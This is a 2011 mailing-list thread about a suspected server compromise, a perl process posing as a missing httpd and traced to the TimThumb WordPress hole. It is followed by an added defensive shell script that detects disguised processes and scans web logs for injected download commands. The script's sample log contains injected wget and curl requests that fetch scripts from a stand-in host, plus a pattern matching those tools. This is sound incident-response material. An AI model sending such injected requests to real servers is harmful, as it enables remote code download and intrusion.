On Thu 06 Oct 2011 10:32:14 PM IST, Michael Mol wrote:
>
> On Oct 6, 2011 12:57 PM, "Nilesh Govindarajan" <cont...@nileshgr.com
> <mailto:cont...@nileshgr.com>> wrote:
> >
> > On Thu 06 Oct 2011 09:06:06 PM IST, Alberto Luaces wrote:
> > > Nilesh Govindarajan writes:
> > >
> > >> One of the servers I manage has a strange problem.
> > >>
> > >> Every 24h, someone starts a process that shows up as perl in the list, but
> > >> the launching command is /usr/sbin/httpd.
> > >> It shows just one process, but when I run something like this:
> > >>
> > >> ps -C perl -o cmd,pid
> > >>
> > >> I get some 5-6 processes alternately with cmd as /usr/sbin/httpd or
> > >> /usr/bin/perl.
> > >>
> > >> The even more interesting thing is, /usr/sbin/httpd does not exist.
> > >> I suspect a rootkit, but chkrootkit & rkhunter reported nothing.
> > >>
> > >> Also, I found a mysterious file: /tmp/ips.txt with the following content:
> > >> xxx.xxx.xxx.xxx
> > >> 127.0.0.1
> > >> addr:xxx.xxx.xxx.xxx
> > >> addr:
> > >> addr:127.0.0.1
> > >> addr:
> > >>
> > >> Is somebody aware of a malware/rootkit which creates such files?
> > >
> > > I had some of that recently. The attacker used an instance of phpmyadmin
> > > to inject into its URL a wget command to download a perl script from
> > > another site. Look for `wget' in the apache logs.
> > >
> >
> > @all
> > Apache was never installed & I don't see any reason to install it
> > because nginx satisfies my needs. I grepped for the string wget in all
> > logs and php files, found some, but they were for libssh2 in wordpress
> > code.
> >
> > @Michael,
> > I thought of doing that, but before I discovered the file, I'd already
> > killed the processes. Will check later when the process is relaunched
> > sometime later.
>
> You might crank up service log levels in anticipation, too, and prod
> your firewall to log unusual-but-allowed connections, too.
>
I just found something:
http://blog.vaultpress.com/2011/08/02/vulnerability-found-in-timthumb/

Data on just one of the wordpress installations seems to have been deleted, which seems to me to be an effect of this. We're removing timthumb and will watch.

Thanks for the tip :-)

-- 
Nilesh Govindarajan
http://nileshgr.com
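Two checks that follow from the thread, written here as an added example; this is not code from any of the posters. The first addresses the symptom Nilesh describes (a perl process whose `ps` cmd field claims to be a non-existent /usr/sbin/httpd): `ps -o cmd` shows argv[0], which whoever starts the process can set to anything, whereas the kernel-maintained /proc/PID/exe link always names the binary really running, so comparing the two exposes the disguise. The second applies Alberto's tip (look for `wget` in the web server logs) to nginx/apache combined-format lines, limited to the request field so a `Wget/1.x` User-Agent does not produce false hits. It assumes a Linux host with /proc and coreutils (`readlink -f`); the function names are mine, the sample log lines are constructed with documentation-range addresses, and the assumed filenames in them are placeholders.

```shell
#!/bin/sh
# Added example, not from the thread. Two defender-side checks for the symptoms
# reported above. Runs on any Linux host with /proc; needs only coreutils.

# ---- 1. Process masquerade check ------------------------------------------
# `ps -o cmd` prints argv[0], which the parent chooses freely and which a dropped
# script can set to "/usr/sbin/httpd". The kernel-maintained link /proc/PID/exe
# always points at the binary actually executing (perl in the thread's case).

# classify_process CLAIMED_ARGV0 REAL_EXE
# prints: ok | missing-binary (argv[0] names a path not on disk) | mismatch
classify_process() {
    claimed=${1#-}                     # login shells prefix argv[0] with "-"
    real=$2
    case "$claimed" in
        /*)
            if [ ! -e "$claimed" ]; then
                echo missing-binary    # the thread's case: /usr/sbin/httpd does not exist
            elif [ "$(readlink -f "$claimed")" = "$real" ]; then
                echo ok                # same file once symlinks are resolved
            else
                echo mismatch
            fi
            ;;
        *)
            # bare name (e.g. "perl"): accept the real binary's basename, or a PATH
            # entry of that name resolving to it (so "sh" running /bin/dash is ok)
            if [ "$claimed" = "$(basename "$real")" ]; then
                echo ok
            elif p=$(command -v "$claimed" 2>/dev/null) && [ "$(readlink -f "$p")" = "$real" ]; then
                echo ok
            else
                echo mismatch
            fi
            ;;
    esac
}

# scan_proc: walk /proc and print PID, verdict, claimed argv[0] and real exe for
# every process whose claim does not hold. Needs root to read other users' links.
scan_proc() {
    for dir in /proc/[0-9]*; do
        real=$(readlink "$dir/exe" 2>/dev/null) || continue   # kernel thread or no permission
        real=${real%" (deleted)"}                               # binary unlinked after start
        claimed=$(tr '\0' '\n' < "$dir/cmdline" 2>/dev/null | head -n 1)
        [ -n "$claimed" ] || continue
        verdict=$(classify_process "$claimed" "$real")
        [ "$verdict" = ok ] || printf '%s\t%s\t%s\t%s\n' "${dir#/proc/}" "$verdict" "$claimed" "$real"
    done
}

# ---- 2. Download-command scan of web server access logs -------------------
# Flags combined-format lines whose quoted request field carries a fetch command,
# plain or URL-encoded. The [^"]* keeps the match inside the request field, so a
# "Wget/1.x" User-Agent further along the line does not fire. Reads stdin.
find_fetch_commands() {
    grep -iE '"(GET|POST|HEAD)[^"]*[^a-z0-9](wget|curl|lwp-download)([^a-z0-9]|$)'
}

# Constructed sample log (documentation-range IPs, placeholder paths), not real data.
SAMPLE_LOG='192.0.2.10 - - [06/Oct/2011:03:15:00 +0530] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Oct/2011:03:14:22 +0530] "GET /phpmyadmin/?a=;wget%20http://203.0.113.9/x.pl HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Oct/2011:03:16:40 +0530] "POST /wp-content/uploads/x.php?c=curl+http://203.0.113.9/y HTTP/1.1" 200 12 "-" "Mozilla/5.0"
192.0.2.11 - - [06/Oct/2011:03:17:02 +0530] "GET /robots.txt HTTP/1.1" 200 64 "-" "Wget/1.12 (linux-gnu)"'

echo "== processes whose argv[0] does not match /proc/PID/exe =="
scan_proc
echo "== log lines carrying a download command in the request field =="
printf '%s\n' "$SAMPLE_LOG" | find_fetch_commands || true
```

On a real host, `scan_proc` also lists daemons that legitimately rewrite their title (nginx and postgres workers, for instance), so allow-list those and treat `missing-binary` as the strong signal: an absolute path in argv[0] that is not on disk is exactly what the thread reports. For the log scan, feed the real access log on stdin (`find_fetch_commands < /var/log/nginx/access.log`) and extend the alternation with whatever downloaders matter in your environment.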